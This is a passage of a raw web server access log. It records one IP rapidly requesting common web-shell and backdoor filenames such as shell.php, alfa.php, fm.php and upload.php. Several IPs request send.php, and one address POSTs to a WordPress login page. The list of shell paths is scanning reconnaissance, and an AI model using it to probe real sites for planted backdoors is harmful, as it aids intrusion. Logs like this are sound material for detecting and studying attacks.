[13/Aug/2025:12:13:03 -0400] "GET /404.php HTTP/1.1" 301 238 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:03 -0400] "GET /log.php HTTP/1.1" 301 238 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:03 -0400] "GET /edit.php HTTP/1.1" 301 239 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:04 -0400] "GET /themes.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:04 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:04 -0400] "GET /fm.php HTTP/1.1" 301 237 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:04 -0400] "GET /wp.php HTTP/1.1" 301 237 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:05 -0400] "GET /upload.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:05 -0400] "GET /index.php HTTP/1.1" 301 240 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:05 -0400] "GET /item.php HTTP/1.1" 301 239 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:05 -0400] "GET /x.php HTTP/1.1" 301 236 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:06 -0400] "GET /shell.php HTTP/1.1" 301 240 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:06 -0400] "GET /m.php HTTP/1.1" 301 236 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:06 -0400] "GET /plugins.php HTTP/1.1" 301 242 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:06 -0400] "GET /as.php HTTP/1.1" 301 237 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:07 -0400] "GET /default.php HTTP/1.1" 301 242 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:07 -0400] "GET /moon.php HTTP/1.1" 301 239 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:07 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:07 -0400] "GET /403.php HTTP/1.1" 301 238 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:08 -0400] "GET /info.php HTTP/1.1" 301 239 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:08 -0400] "GET /admin.php HTTP/1.1" 301 240 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:08 -0400] "GET /ini.php HTTP/1.1" 301 238 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:08 -0400] "GET /0x.php HTTP/1.1" 301 237 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:09 -0400] "GET /radio.php HTTP/1.1" 301 240 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:09 -0400] "GET /alfa.php HTTP/1.1" 301 239 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:09 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:09 -0400] "GET /1.php HTTP/1.1" 301 236 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:10 -0400] "GET /law2.php HTTP/1.1" 301 239 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:10 -0400] "GET /file21.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:10 -0400] "GET /file22.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:10 -0400] "GET /file23.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:11 -0400] "GET /file24.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:11 -0400] "GET /file25.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:11 -0400] "GET /file26.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:11 -0400] "GET /file27.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:12 -0400] "GET /file28.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:12 -0400] "GET /file29.php HTTP/1.1" 301 241 "-" "-" 172.192.63.224 - - [13/Aug/2025:12:13:12 -0400] "GET /file30.php HTTP/1.1" 301 241 "-" "-" 68.183.245.101 - - [13/Aug/2025:12:26:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:12:26:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:12:26:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:12:26:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:12:26:10 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 38.47.182.198 - - [13/Aug/2025:12:29:15 -0400] "POST /dental-tourism/teeth-implant/wp-login.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" 38.47.182.198 - - [13/Aug/2025:12:29:18 -0400] "GET /dental-tourism/teeth-implant/wp-admin/ HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"